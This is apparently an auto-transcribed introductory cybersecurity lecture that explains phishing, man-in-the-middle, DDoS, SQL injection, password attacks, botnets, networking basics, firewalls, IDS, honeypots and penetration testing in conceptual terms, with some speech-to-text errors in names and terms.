Themselves in such a way that they would consume the resources of a computer thus crashing the computer and then requiring a reboot a trojan horse is another software that will allow a backdoor entry or a covert channel to that hacker where the hacker in this case would then
Be able to gain access to the victims machine through the covert channel or the back door without the knowledge and the authorization of the user themselves let’s talk about social engineering attack now this is where your people skills come into the picture this is the art of manipulating people and
Convincing them to give up confidential information either knowingly or unknowingly so most likely well we trust our friends right and we talk to them a lot and we give out some confidential information which we would not give out to others what if somebody is pretending to be our friend just to
Get this information out of us and we trust this person we give out that information and we suddenly get affected because of that now i’m not saying that everybody in the world does that but it is one of the most common attacks that is experienced in the computing world
Now social engineering attacks can be broken down into three categories first is a phishing attack don’t worry about that figure over there you’re actually not going to go fishing it’s basically what known as a phishing attack then there is a spear phishing attack and then there’s a veiling attack all of
These are types of social engineering attacks where you of uh where you’re targeting a user uh by sending out fake mails or fake websites and their gullibility into clicking on those links and then giving out information so what is a phishing attack it is a practice wherein a hacker usually sends fake
Mails which look really genuine or hosts fake websites which also look genuine and looks like they’re from a trusted source once you click on those links there would be embedded scripts or embedded malwares which would then be executed and and then get installed on your machines compromising the security
Of your device these utilities could be used to steal credit card information create steal data from your computer upload data to your computer use your computer as a bot and anything and everything that the hacker might want to do spearfishing is a variation of phishing now phishing is a non-targeted
Attack it is to the whole world at large whoever becomes a victim becomes a victim however spear phishing is a targeted attack it is to a specific individual or to a group of individuals in an organization so it becomes a customized attack you identify the victim you identify the flaws that are
Existing over there in the organization you identify the gullibility of the victim create that fake mail to suit that particular situation send it across to them they’ll click on that link and get infected by whatever payloads that you have embedded within it railing is when you are targeting particularly
Wealthy or powerful people in the industry so normally uh when you’re targeting ceos cfos high-level management people of an organization it would be known as a veiling attack so here the example is where the email has been received your customer your account is going to expire today to keep your
Account activated please click on the link here and proceed with the verification process now here the link that we see activate.com would be a hyperlink which is going to mask the actual url with the link is going to redirect us right here the attack is on the gullibility of the
Customer where they would fear that the account would be deactivated and to prevent that they would press this email click on the link and then provide the information thinking that they’re just reactivating their account but they’re actually leaking their own information to the attacker so the first thing you
Have to understand is banks or any organization are no not going to send you any emails with the link in it asking you to reactivate or anything like that in fact banks proactively tell us that they are not going to give uh call us and ask for any information in
Fact they would want us to call them on their registered number or the helpline number that they have declared on their website or on the cards that we possess then moving on to social engineering this is something very common in today’s world this is basically where the prey
Is the human itself and the reason social engineering attacks are very successful is because of the gullibility factor that a human has for example human has something called emotions that a machine wouldn’t you could plead with a human for a password to be reset by gaining sympathy or empathy but try
Doing that with a machine those attacks are going to fail social engineering attacks are not only limited to those but we can talk about fishing phishing is also a part of social engineering attack where the gullibility of the user to click on that link is being exploited
In this scenario here this is clark he’s calling from the id security team that means that he is impersonating probably and then telling the victim that the system has been compromised please share the password with me the victim on the other hand thinks that the person is trying to help her
Probably doesn’t verify that person trusts that person and then provides the password over the phone now here it is fear that is being exploited because the password being compromised would uh clearly upset the end user for loss of data or for the computer revealing out confidential information thus here that
She’s trusting the itd security team for the password to be reset and given back to her then we come to the network attacks man in the middle this is also known as eavesdropping attack which literally means that you are going to listen in on to somebody’s conversation
For example in the figure the client is trying to talk to the server but you become a man in the middle and you try to listen in on the conversation that is going on now obviously the conversation over here may not be audio but the data that is being exchanged between the
Server and the client you just listen in you make a copy of that data and you store it at your end the data could contain usernames passwords may contain confidential information and help you compromise data the attacking computer takes the ip address of the client so
You find out the ip address of the client the client is not aware of about this the client is trying to communicate with the server you spoof yourself as a default gateway or a trusted device and the client thinks that it is through you that they need to communicate to the
Server and thus they start sending data via your pc so this attack normally happens on public wi-fi networks i’ve seen that happening a lot and does i never recommend anyone using those public wi-fi for example you go to a coffee shop they have free wi-fi over
There you connect to it and you start surfing you start browsing you are always signed into google facebook accounts your bank accounts and what not and then there’s a sniffer there is a hacker who is doing a man-in-the-middle attack capturing all that data now it’s
Not an easy attack but it can be done so this diagram shows where the man in the middle attack has become successful and now that the client and the server both are sending information via the attacker without knowing them knowing that the attacker is capturing all that data uh
Here suppose you’re in trouble and you need money right now and you call your friend and ask for money so here the person is calling john uh telling john that they’re in trouble and they’re asking for jon to give their credit card number over the phone now this is a
Legitimate transaction the friend is actually calling john and asking for some help however when john is providing that help over the phone with the credit card numbers maybe the cvv number and all of that and then the otp at the end of it at the same time there could be a
Hacker doing a man-in-the-middle attack where they could be eavesdropping on whatever is being said or whatever data is being transferred and once they capture this confidential data they can then misuse that data to their own gains then comes the denial of service attack the motive in a dos attack is uh not to
Benefit monetarily but to bring down a service for legitimate users that’s just causing harm to the organization for example if i consume the bandwidth of to a particular website since there is no more bandwidth left other legitimate users who want to interact with the website will not be able to connect to
The website thus creating a denial of service to those legitimate users now it may not be possible for me to use my laptop to target a cluster of servers because obviously the bandwidth at the other end would be very high so i would distribute my attack across multiple devices thus creating a distributed
Denial of service also called a ddos attack then we come to the sql injection or sql sql stands for structured query language which is the de facto language that is used by applications to interact with databases so let it be a microsoft sql database mysql database oracle sql
The syntax may be a little bit different but it is still the structured query language that applications utilize to interact with the database now the queries that are created by the applications need to be sanitized at the application level itself so developers need to be very careful of how they are
Going to create those queries what queries are allowed to go to the database because a database is designed to answer queries it doesn’t know what is a legitimate query and what is a illegitimate query if it receives a query it is going to try to execute it
And give out information thus a hacker may insert malicious queries or malformed queries into a sql server through the vulnerable application causing a security event so depending on the queries that have been created the attacker could delete some data or modify data add data edit it or do
Anything that is malicious in nature that would compromise the integrity and the security of that database for example the dunkin donuts right except apart from being a credential attack since they got access to the database they could have added or deleted any information about any users
That were there a password attack as the name suggests this attack is used to crack or get the password for users account or when we say crack passwords this is basically where somebody’s trying to brute force or they’re trying to guess the password and they’re going to break the password thus getting
Access to your accounts there are five different ways passwords can be cracked the first one is a dictionary attack where we use every password that is possible through the dictionary now this is the use of an actual dictionary and that’s one of the reasons when we try to
Create passwords we are advised not to create passwords based on dictionary words because these are easily guessable and there are lists already out there that contain all of these words there’s a tool that you can utilize and that tool will then pass through each and every word that is in the dictionary
File and then compare it to a possible password if one of the words matches the password has then be compromised so if you are observing a little bit higher security where we have created a password that is not based on the dictionary world then we want to look at
Other attacks like brute force it is a trial and error method so basically what we do is we identify how the passwords were created for example in today’s world the policies would be to consume in a password any uh any of the alphabet characters a through z uppercase or
Lowercase 0 through 9 and then special characters and then we want to randomize the usage of these characters so that they are not easily guessable but a brute force attack at the same time would then try every permutation and combination there is possible in the entire
Character set and then try to figure out the password now this takes a really long time and does take a lot of compute and storage power and that’s where the botnet example comes in comes back in the one that we saw earlier which was used for dos attack but similarly if i’ve
Infected multiple computers like this i can then distribute this attack onto all those computers and use the entire compute power that is available to shorten the time that is required to uh crack the password now based this is 100 successful given the time that it may
Take so if the time that is going to take is going to be a hundred years the attack becomes unsuccessful because during that period uh the password is most likely to be changed the technology is going to be changed and so on so forth so if the password is easily
Guessable this can be a very easy attack to perform then a key logger which is a similar attack to what we have seen so a key logger as discussed earlier is nothing but a software that once installed on your machine would grab each and every key stock that the user
Has made and store it in a file which the hacker can later on access so whatever you have been typing passwords credit card information or anything else all of those would be recorded and stored in the file and that’s one of the best way a password can be compromised
Then shoulder surfing this is a physical attack rather than being a technical one here you need to be physically present when the user is typing in their password and you actually look over their shoulder to see what they’re typing and try to figure out what the password is if they’re quick typers it
Is going to be a little bit more difficult if they’re slow typers it’s going to be that much more easy and the last one is called a rainbow table now passwords when applications store them are stored in hash format hash is nothing but a one way signature that is
Created of the password file of the word that is used for the password and it is based on an algorithm so the input could be a variable length for example a password could be 7 to 14 characters but the output of a hash value would be fixed based on the algorithm that you
Are consuming so most common algorithms in today’s world that we utilize are sha secure hashing algorithms before that we use md5 or message digest so all of these convert the passwords from plain text into a hash value and store it into a database so if you actually attack
That database to grab a password you’re going to get the hash value not the password in clear text and thus in that scenario comes the rainbow table to the rescue a rainbow table is nothing but a file that will have a list of all possible passwords along with their hash
Values in the required format so if you remember the dictionary attack the dictionary attack was nothing but a list of words based on the dictionary that were stored in a file and then the software was just trying each and every word against a possible password here we
Do not have the word but we have the hash value so to reverse engineer hash value what we created is we created a rainbow table where there would be a list of other possible passwords and their corresponding hash values so we then compare the hash value that we have
Captured and then search for that hash value in the file that we have created the hash value that matches the corresponding word to it is the password in clear text so these are the five types of password attacks now let’s talk about the types of network attacks an active attack is
An attack when the intruder attempts to disrupt the net network’s normalcy and modifies the data and alters that data at the same time so as you can see in the diagram there’s a sender and there is a receiver the attacker is the man in the middle who is now trying to create
The active attack so when the sender sends that data to the receiver the attacker intercepts that data modifies the data and then sends the modified data to the receiver since the attackers is a man in the middle as we have seen in the previous attacks the receiver
Neither the sender would be aware of the attacker and thus they would not be aware of the modification that has been done in a passive attack the intruder just eavesdrop on the data they just listen in on to the conversation but they do not modify the data at any time
So they just capture the packets they copy the contents so that they can use that at a later stage let’s look at the history of cyber crime so as you can see this graph shows us how cyber crime has progressed over the years in 1990s mnc database pentagon and ibm were hacked in
Again in 1990s national crackdown on criminals microsoft nt operating system pierced so uh this is where hacking started becoming more mainstream right uh before this hacking was very much limited to organizations who used computers but in the late 80s internet happened and then we had e-commerce coming in which basically led to our
Online retail stores online banking and online data stores as well which then led to criminals hijacking this data or hijacking your money and trying to steal it on the internet itself in 2001 cyber criminals launched attacks against ebay yahoo cnn amazon and other organizations 2007 this was where one of the biggest
Bank hacks had happened swedish bank nadia they recorded at least a million dollars being stolen in three months from 250 accounts 2013 adobe had 2.9 million accounts compromise and their usernames and passwords released on the open internet in 2016 kaspersky one of the leading antivirus providers to the world
Reported around 758 million malicious attacks that occurred which they identified themselves these are some of the most famous faces in cyber security or earlier cyber crime in 1988 robert morris he’s an american computer scientist and entrepreneur he’s best known for creating what is called the morris worm
And this was way back in 1988 and this is the first computer worm that has been identified on the internet kevin lee or kevin lee polson in 1990 he was accused of hacking into a los angeles los angeles radio station called kiis hyphen fm where there was a contest going on and
If you’re a particular number of caller and give a correct answer you’re supposed to win a porsche 944 and he hacked the those telephone lines ensuring that he became that particular person and answered the question correctly uh it was later on revealed that this actually happened he was
Jailed for it then comes david smith david smith uh he created the melissa virus now melissa virus one of the most dynamic viruses known around march 1999 that’s when this happened this virus was released and this was a macro based virus which affected microsoft world and outlook
Based files adam bought bill in 2004 he’s also an american computer hacker from michigan he gained unauthorized access to love’s computer uh corporate computer network via an open unsecured wireless access points uh now these access points back then were not that much secured uh the these people were
Able to identify it what they tried to attempt by doing that was gain access to the company’s network and install the software which would then help them capture credit card information of that organization right and uh this was later on identified as well and he was prosecuted for that crime and got jailed
Just a matter of trivia kevin lee polson he was one of the first people found guilty and was banned from using computers and the internet for three years after his release in today’s world we cannot even imagine living without the internet this guy lived for three years without it now
Let’s go a little bit further and see what would motivate people for committing such cyber crimes right the first and foremost motive is disrupting business continuity others would be uh looking at data theft or information theft and manipulating that data to gain from that data so if i’m able to access
Your computer and steal some data that has some value to you and sell it or make it public you would be at a financial loss because that data no longer has any value creating fear and cures by disrupting critical infrastructure for example a company’s infrastructure crashes the services are
No longer being offered by that organization and people start panicking uh start fearing an attack by cyber criminals and uh it leads to chaos financial loss to the target which is very obvious if i do a denial of service attack or if i make a service and a
Variable from an organization what is going to happen is since the that service is not functioning uh the company is not going to make any money out of it and that’s going to suffer a financial loss achieving states military objectives are one country spying on another country trying to gather
Information about their military intelligence military activities or any other activities that can harm the original country demanding ransom hackers can encrypt your data and then demand a ransom from you in lieu of decrypting the data again damaging a reputation of a target impersonating a user on the social media platforms
Making false statements thus damaging the reputation of that person and propagating religious or political beliefs religious fanatics promoting whatever cultures that they want to promote trying to gain more followers thus bringing more unrest to the world any of these could become motives for cyber crime so this is why we want
Cybersecurity cybersecurity should be in place to prevent these kind of attacks so what exactly is cyber security it refers to the practice of protecting networks programs computer systems and their components from unauthorized digital access and attacks so whatever your digital footprint could be servers computers switches routers web servers
Web applications that you’re hosting over there services that you’re consuming from the cloud or providing to other customers you need to secure all of these to ensure that the integrity and the confidentiality of these services is intact and none of these services are affected by any cyber attacks which could lead to disastrous
Results so the main difference we want to understand here is the difference between cyber security and information security information security is data within the organization where they handle sensitive information or proprietary information copyrighted or patented information and they want to secure it from data leaks or having the data in somebody’s computer’s hands
Cyber security is basically a technique used to protect the integrity of network so this is when you’re going to go on the web and on the internet you’re going to secure your devices that you have deployed allowing people to access your infrastructure from the outside so what
Could be the cost of not being cyber secure if you get hacked or if your data is compromised or if your information is compromised you could have a lot of repercussions your good will be go for a task you may be open for lawsuits not only from clients but from customers as
Well you could be open for fines or penalties from government organizations for failing to follow the law of the land customer trust will obviously be hampered if you have been hacked and your data has been compromised you wouldn’t want to deal with that organization in the future all of this
Could land the organization in a financial crisis where all the lawsuits and penalties that are being imposed could basically bankrupt that organization and does take it out of circulation so now let’s look at some basic terminologies which we need to understand to go further in the cybersecurity world first and
Foremost network what is a network network is nothing but a group of interconnected devices could be servers could be workstations could be laptops could be any devices file printers and what not to be interconnected with each other as you can see in the in the diagram it is used for communications
It’s used privately used for data transmissions and to communicate between various terminals so that the business can go on it is also used to share data information it could be wired or wireless so you got a wired lan or at home we all have wireless networks where we connect all our devices we
Use them for streaming videos we use them to connect to the internet serve websites work from home so we’ve got office also set up on our wi-fi so a network is nothing but a collection of interconnected devices that are allowed to communicate each other freely so that
The business can be continued in a proper manner server a server is nothing but a hardware device that is supposed to handle requests of data information allow network services to function from other computers and devices so this is where we build a client server relationship where on the server we’ve
Got uh we’ve got the major software we got the d we got the data that is stored over there and clients that interact with the server to consume that data in a particular manner that would help them make sense and analyze that data and generate business out of them then the
Internet internet is nothing but the collection of multiple networks globally so all the networks that we have across the globe when they are interconnected with each other that is what internet is and if you just go back and we talk about servers this is what allows the internet to be formed so every
Organizations when they publish their servers on the internet and they allow everyone to interconnect through those servers that is where the internet comes in the servers being the backbone of the internet obviously for the servers to communicate with each others we will need switches routers and other devices
For the data transmissions to happen so these are the multiple networks could be individual networks internet interconnected together would form the internet across the globe for the internet to work there would be a set of protocols for transmissions to be allowed across the globe now this is where tcp iep or the transmission
Control protocol over internet protocol comes into the picture so if you remember we use communication channels like tcp or the transmission control protocol and udp user datagram protocol when we connected connect to web servers we talk about the http protocol and https protocol if you want it secure
Then we’ll talk about imap pop3 and all of these protocols now where do these protocols come from it is nothing but a suite of the tcp software which contains all of these protocols which allow computers to communicate with each other if tcp wouldn’t have been there our
Network would have collapsed now when we have tcp ip and we want to communicate across the globe how would we identify devices on the internet or even on the intranet because the devices don’t know us they are not going to use our usernames and passwords to communicate
With each other but when i want to connect to a website or a device how do i identify it on the internet or the internet i obviously use ip addresses now ip addresses are nothing but the internet protocol addresses which are 32-bit addresses which look exactly like the one shown on your screen
172.16.254.1 now there is a lot of classification of ip addresses and some of these ip addresses work on the internet some of them are supposed to work on private lands but i will reserve that for a later uh topic then the second way that we are identified on the
Internet or the internet are with mac addresses so media access controls or mac addresses are hard-coded addresses that are given to our network interface cards these cannot be modified physically at any point in time however there are techniques to spoof mac addresses which we can then obfuscate
Our existing address and give us a new one that would again be discussed in a later in a later lecture a router we’ve been talking about routers and switches router is nothing but a device that passes packets back and forth across networks it routes the data in the
Appropriate path so it is an intelligent device it can understand ip addresses and mac addresses it can identify different parts of reaching a particular network for example if i’m sitting in india and i want to communicate across the world to america there would be a specific path that needs to be followed
For my data packet to reach the other side of the world it is the routers that would map this path store it in their cache so when i tried to connect to that server they would retrieve it from the cache and send the packet across the globe so
The home router that we use at home on wi-fi is our default gateway to connect to the internet and thus it allows our internal devices to communicate with each other within using internal ip addresses and when we want to go to the internet it will then route the traffic
On the internet and send the packet to other servers that we want to communicate with now what is a domain a domain is referred to as a group of computers and other devices that are interconnected and treated as a whole now a do menu is used by an organization
So let’s say if i am xyz xyz being the name of the organization and i want to create and a domain which will allow me to create a group of interconnected computers for my employees to interconnect with each other and send and manage data i am going to create a
Domain for my organization and attach all the devices create users and interconnect them using a domain so this is where you you’re going to have a centralized approach of a server client relationship where you’re going to have a main domain and you’re going to have devices connected to the domain now when
We go on to the internet the domain name is nothing but the base part of a website name so when you say google.com and you type it in your browser you’re taken to the webpage called google.com which is the search engine that you’re connected but for google the
Organization at the other end they would have a data center over there which would have all that relevant data which allows you to search through that information so for them the domain would be the internal part where they’ve got this cluster of servers creating a data center where all that information is
Stored but for us as consumers a website called google.com would be a domain for us to visit that particular website and consume the services that they’re offering on the internet so here the example is https which means that it is a secure website port 443 and we’re connecting to cybersecurity.com
Cybersecurity.com becomes the domain name https becomes the protocol that we want to utilize to connect to that particular website then we come across dns or the domain name system it is nothing but an index something like a phone book which is responsible for mapping the domain name into its
Corresponding ip address now remember i said that there are only two ways we are identified on the internet or the intranet either the ip address or the mac address if it is devices if it is computers were talking to each other it would obviously be ip addresses but if i
Type in google.com i’m giving it a domain name the internet does not understand domain names so there is a dns a server which is an index or works like an index or more like a phone book which will have a list of all the domains with their corresponding ip
Addresses so whenever i type in google.com the request goes to a dns server the dns server is queried the ip address of google.com is identified pasted onto the packet and then the packet is routed through the router to the path that it has determined to reach the google.com server here replace
Google.com with cybersecurity.com so as you can see on the screen the local pc queries the dns server the dns server replies back with the ip address now if you’re wondering how does this work if we’re going to take an example of home networks the isp or the internet service
Provider gives us a default gateway or a router with their own ip addresses for dns servers and default gateways so when we try to connect through the router the router has the ipr of the dns server and it routes that query to the dns server the dns server replies back with the
Appropriate ip address the router then takes that ip address figures out the path and sends it across to the targeted server dhcp or the dynamic host configuration protocol it is a protocol that dynamically assigns ip addresses to the devices in the network so we have discussed that ip addresses are required
By computers to communicate within each other but who associates or who gives these ip addresses to these computers so for that to happen we have got a dhcp server that is created if you take your home networks it is the router that has the dhcp role installed on it so
Whenever a machine boots up it sends out a broadcast request looking for the dhcp server and then there’s a communication with the dhcp server the dhcp server then allocates an ip address to the computer who is requesting it and once the ip address is allocated an entry is
Made in the dhcp servers cachet with the corresponding mac address of that particular machine then we come to the next top topic called vpn or a virtual private network it is a connection between a vpn server and a vpn client it’s basically a encrypted channel that you’re creating between two end points
And the main reason for a vpn is to encrypt your data so that it is now no longer subject to man in the middle or eavesdropping or modification attacks so this is a layer of security that you are adding when you are connecting to the internet using an encrypted channel
Which should prevent you from getting hacked or your data being compromised by hackers so as you can see here and if you remember the previous top previous slides that we have seen the hacker was able to copy the data very easily now that it is an encrypted channel even if
The hacker tries to eavesdrop and capture that data it will be formatted in such a way that they would not be able to make sense out of it now the attacker or the hacker will try will have to try to decrypt the data so that’s another attack that they’d have
To execute to find out the encryption key decrypt the data and then look at what the data was then we come across botnet now first let’s first understand what bots are bots are nothing but the softwares that can be installed on vulnerable machines that would allow the
Hacker to send commands to the infected machines to generate some traffic or to do what the command tells them to do so most of the botnets are used for distributed denial of service attack if you remember the dos and ddos that were discussed a while back this is where we
Tied up with how they are executed so a bot master or a hacker let’s call them a hacker would try to identify vulnerable devices across the internet and try to install the bot onto those devices the bot essentially is a software that would revert back to the bot master and
Advertise their availability whenever they have been powered on a collection of such infected devices would essentially be called a botnet when there are enough number of machines that the attacker fill fields are good enough to launch that attack on the targeted servers the hacker will then initiate those devices send the commands through
The botmaster to the bots and the bots would then generate that kind of traffic what whatever they have been configured for and then attack the targeted server now this is also done to opt to mask the identity of the hacker since the attack is being generated through the botnet
The ip addresses of the botnet computers would be reported to the targeted server not the actual hackers ip address so it to figure out who the attacker was would be very much difficult depending on the size of the botnet so this you can see is the attack that is included over the
Victims and the malicious traffic has been generated through the botnet and the victims have been targeted through that so as said once that traffic has been done to forensically investigate at the victim’s end they would find the ip addresses of the botnet and not the attacker alright let’s start talking
About network security controls network security controls are nothing but implementations of various devices to enhance the security of a particular network these could be firewalls intelligent detection systems or intrusion prevention systems honeypots unified threat management systems and so on so forth the next gen firewalls that
We talk about right so let’s look at a review of what these devices are now a firewall can be a hardware or a software that is responsible for allowing or disallowing a certain amount of traffic to or from your computer so these are basically created to enhance the
Security portion of your network where you can configure them for certain level of traffic to be allowed or some traffic to be disallowed now a firewall is not going to decide by itself what is a good amount of traffic or what is bad traffic you’re going to configure the firewall
By creating rules based on ip addresses port numbers protocols and what may and based on this the firewall will then analyze the traffic coming in or going out to the inbound or the outbound rules and if the traffic is allowed it will allow the traffic to go through if
There’s an explicit rule which says deny the traffic it will drop the packets or it will delete the package it will not allow the packets to go past it so if it is good traffic that means it matches a rule that has been created that allows the traffic to go through the firewall
Will allow it if it’s bad traffic that means that there is a rule which denies the traffic to pass through it will get blocked at the firewall level itself it will the firewall will not allow it to enter the network similarly an intrusion detection system it is designed to
Detect unauthorized access to systems or intrusion attempts as well now it works along with the firewall and the main thing is that here there’s a database against which it can compare the traffic so most of the attacks that we’ve talked about there are some distinct signatures that would cause concern or that would
Highlight that kind of an attack most of the organizations try to develop these kind of signatures have them in a database and store them on the ids so that ids can analyze the incoming traffic look at patterns from the traffic coming in or going out compare it to the database of the signatures
That it has and if it matches any of the signatures it will then detect that as an attack and send an alert to the administrator where the administrator will then have to manually come in and check it out a intrusion prevention system as described earlier or as mentioned earlier can be configured to
React to that particular event so if it detects something that can be classified as an intrusion an administrator can pre-configure it to to react to that particular packet in a particular manner for example drop the packets or reflect them to a honey pot or want the administrator or do all of these things
At the same time so as you can see on the diagram and the internet there’s a hacker a sense of the data packets come in the firewall is not able to analyze the traffic because of a firewall cannot analyze the contents of a packet it can
Only look at the header it can only look at the ip addressing and the ports that that have been created or the rules on which those things have been mentioned and then it allows the data to go through it reaches the ideas the ideas then looks at two ways to scan
One is a signature that we’ve just spoken about where the developer of the ids creates those signatures and stores them onto the database or another thing that is known as heuristic scanning which is nothing but behavioral scanning so it looks at the behavior of the data and if the behavior looks malicious it
Will then raise an alert and warn the administrator then let’s come to honeypots we just discussed in the previous slide that an ips or an intrusion prevention system can be pre-configured that if it detects an animally or if it detects an intrusion it may redirect the traffic to a
Honeypot what is a honeypot a honeypot is a decoy system it is created to showcase a certain set of vulnerabilities to try to attract the attention of a attacker now the word here is used as lure but it’s more to deceive the attacker for example if the
Attacker has been able to bypass your firewall and your ideas and now can scan the entire subnet when they scan it they would come across a device which is pretty vulnerable or showcases some vulnerabilities which would definitely impress the hacker because they would think that it is a vulnerable server
Which contains some valuable data and that exactly what honeypot is it’s a decoy server trying to uh trying to act as a production server trying to showcase that it has some valuable data but also has some vulnerabilities in it so that the attacker can be attracted
Towards it and spend some time trying to attack it or analyze the honeypot at the same time the honeypot will analyze the data traffic and it will warn the administrator of a possible intrusion which will give the administrator enough time to secure the rest of the network
And will also get to analyze the logs of the honeypot one to try to understand what kind of attacks the attacker is trying to create and try to reverse engineer and identify the attacker at the same time let’s talk about security testing security testing is nothing but
A method which is carried out to identify threats and loopholes in a system so here we are going to do a vulnerability analyst and penetration test we may also go ahead and do a security audit so what is vulnerability scanning penetration testing and security auditing vulnerability scanning
Is the activity which you are conducting to identify or look at possible weaknesses or issues or vulnerabilities or misconfigurations that exist in your infrastructure so it is a proactive way where a team of security experts will launch a vulnerability scanner scan certain devices that they have pre-identified and once the report from
The vulnerability scanner comes in try to analyze the report and make sense out of it to see if there are any vulnerabilities that can be identified on those devices this is obviously an ongoing process why because operating systems are patched upgraded new versions of softwares are released and
We keep on upgrading and we keep on changing our id infrastructure ever so often and hence the iot infrastructure i guess say is an ever evolving process and to be a priest of all the latest vulnerabilities and threats we need to do the vulnerability analysis in an ongoing manner to identify
Possible threats to the organization so then what is penetration testing vulnerability analysis is just identifying the vulnerabilities gaps misconfigurations that may be in the organization’s infrastructure a penetration test is basically to validate whether those vulnerabilities that have been reported are real if yes how complex are they what would be the
Impact and what would be the technological impact and what kind of data would be compromised or what would be the end result of that attack if it actually happens in the real world so here a bunch of ethical hackers would simulate an attack from a hacker’s perspective or from an insider’s
Perspective a malicious outsider or a malicious insider depending on how they perceive the vulnerability as and then they will try to test the vulnerability to see how it can be exploited to what extent it can be exploited and what would be the compromise or what would be
The data leakage that would happen if this vulnerability gets exploited so there are three ways a penetration test can be conducted there is a black box testing a gray box testing and a white box testing if you look at black box testing this is where the tester or the
Penetration tester rather has no knowledge about the organization their infrastructure applications or anything so this is where you’re simulating a hacker who’s sitting on the outside who has no knowledge about the organization so they start from the information gathering phase where they’re going to try to figure out the ip addresses the
Ip ranges devices operating systems applications and anything and everything that the organization is going to use and then try to figure out vulnerabilities within them and then try to attack those vulnerabilities this is a very time consuming and a cost consuming audit the second one is a gray
Box testing audit where a partial knowledge is given to the penetration tester so this simulates a regular user kind of an attack so let’s say if i’m a regular user in an organization and by when i say a regular user i’m saying i’m not an administrator so i have got
Limited access and based on that limited access and the limited knowledge that i can gather about the infrastructure by being a regular employee we are going to simulate a test with that knowledge to see whether a employee can take disadvantage of any vulnerabilities or and then try to worm their way into the
Organization’s infrastructure and hack it the white box testing on the other hand is where we’re looking at an insider a malicious insider who already has all the accesses who already has all the controls in his hands so simulating an administrative access and then trying to figure out whether this administrator
Can escalate their privileges and gain some other administrators access and try to then compromise data for example even if i’m saying i’m an administrator i am not the only administrator in the organization there would be backup administrators there would be system administrators there would be the active directory administrators there would be
Application administrators database administrators and so on so forth so every single component that we have may have a different administrator for example switches would have a different administrator same thing with firewalls or any other security controls that you have so if i am a administrator for
Backup can i then try to work my way out escalate my privileges as a regular administrator or a system administrator and then crack their passwords try to get access and manipulate some data so these are the three types of penetration testing audits that you will come across there would be some different subtypes
But every organization can customize these kind of audits to whatever they require then we come to security auditing security auditing is nothing but an internal check that is carried out by internal auditors that means people who are employees within the organization to find out flaws in the organization’s information system now
This is more on the compliance side this may take inputs from the vulnerability assessment and the penetration test but overall we want to see what kind of policies that we have in our organization whether those policies are working properly whether they make sense are there any gaps and based on the
Technical inputs from the vapd team how do we map with the policies that we have defined for that organization for example a password policy now we have documented that the password policy should be effective enough that passwords cannot be easily brute forced so that’s a high level policy then we
Dictate a procedure for that policy to be implemented where we say hey we want the systems to be configured where the password meets some complexity standards for example uh should be uppercase and lowercase a through z 0 through 9 should use special characters and should be randomized password should not be
Dictionary based or based on the user’s name now these are this is the policy that we have created and the procedures that we have defined are they being actually implemented in the real world so a vulnerability analysis would determine whether the passwords are probably weak or not so if the
Vulnerability report comes back and says the passwords are probably weak then a penetration tester would go in and then try various attacks to see if passwords can be compromised now first and foremost what is cyber security there are three main pillars of cyber security that we deal with since the inception of
Computers and they’re known as the confidentiality integrity and availability triad also known as cia not to be confused with the american intelligence agency but here we’re looking at three different pillars where we want our data to remain confidential the integrity of the data to be intact
And the data to be made available at all points in time so let’s talk about these three aspects the principle of confidentiality asserts that the information and functions can be accessed only by authorized parties so for example even if you password protect your file what is it that you’re trying
To do you’re trying to prevent other users accessing your data and peeping into your files so that your data remains confidential it is only shared with people who know the password integrity this is where the trustworthiness of that data comes into the picture where if the data is going
To be changed for example you have a spreadsheet which has a lot of information about users and their login activities and whatnot and you want to ensure that that data is not modified by any unauthorized user so you’re going to verify that the information is correct and is not
Modified by anybody who is unauthorized the availability part ensures that this data is made available to all authorized users when and where they want it right the principles of availability assert that in systems functions and data must be available on demand according to agreed upon parameters based on levels
Of service now this is where your service level agreement should come in for example when we log on to gmail we always assume that gmail is going to work and it’s going to be available online at no point in time or very few times has it ever occurred that you’ve
Gone on to the internet typing gmail.com and the website is not available in fact if the website doesn’t open we figure out the internet is not working right but gmail as a service is always made available now when we talk about threats to cia the confidentiality integrity and
Availability we talk about them in two different parameters cyber crime and hacking so what is cyber crime cyber crime is any criminal activity or any unauthorized activity that would involve the usage of any computing device which would result as a security incident at the victim’s end most cyber crimes are
Carried out in order to profit from them criminals would try to do phishing attacks to steal your money out of your bank accounts or who try to con you into giving out your credentials thus compromising your email accounts or your social media accounts and try to gain access to your identity cyber
Crimes are generally carried out against computers or devices directly to damage or disable them spread malware secret and steal secret information etc so this talks about the motivation part of cyber crimes what would be the motivational aspect for a person to conduct such an activity right so basically to cause
Damage like wannacry happened in 2017 the perpetrators those those used wannacry probably gained a lot in the ransom that they demanded for that data to be decrypted but it also cost the world a lot of money in profits that were lost right let’s move on to titling
Crime so what what do we mean by cyber crime now again we in if you remember a few slides back a few topics back we talked about information security and we talked about cyber security and we talked about the difference between both of them information security could be about anything normally contained within
The organization the data that the organization has and us securing those data by introducing the security controls that we talked about cyber security would be something that is on the internet or on the web so any web application that i have deployed on the internet any databases that i have that
Would talk about cyber security so if your facebook account gets hacked or your onedrive gets hacked that’s where cyber security comes into the picture but if your physical computer gets hacked because your password got cracked by a physical attack that’s where your information security is so some of the basic
Ways of preventing cyber attacks on us use unique and strong passwords we’ve just discussed the complexity of the passwords we want to keep them random they should not be guessable they should not be based on dictionary words and they should be randomized in such a way that they cannot be predicted or guessed
The length of the password should be very good should at least the minimum bare minimum should be eight characters even that is not suggested in today’s world it has to be at least 12 to 16 characters an operating system i think in today’s world will support up to 24
Or 26 characters if you go into encryption softwares they support up to 60 odd characters of passwords so you want to keep those unique you want to recycle those passwords on a regular basis you do not want to reuse old passwords again and again avoid public
Wi-fi that’s a must we always look for free wi-fi we go to coffee shops because they advertise free wi-fi that’s now it nowadays a unique selling point uh for uh coffee shops and uh establishments and we go there we connect to the wi-fi because we get free internet and we get
To serve whatever we want the problem is we have no idea who else is connected to that wi-fi and what kind of attacks they are creating we would discuss wi-fi attacks later on in one of the later videos where i can demonstrate how these attacks work but for now just remember
That public wi-fi’s are very risky and if your security is not up to the mark you might just end up getting hacked like nobody’s business ignore and delete mails from unknown senders phishing attacks very common attacks in today’s world you get an email saying you’ve won a lottery or you’ve been chosen for
Something or please don’t click here to download your free software and something like that and those emails are plenty nowadays i received an email yesterday where there was a nigerian prince who had died and he had left around 500 million dollars behind and there was this accountant who wanted to smuggle
That money out and it was a huge email giving me all the details and out of seven billion people on this planet they identified my email address and they wanted to share half the money with me so that they can masquerade the money and avoid paying taxes inheritance taxes
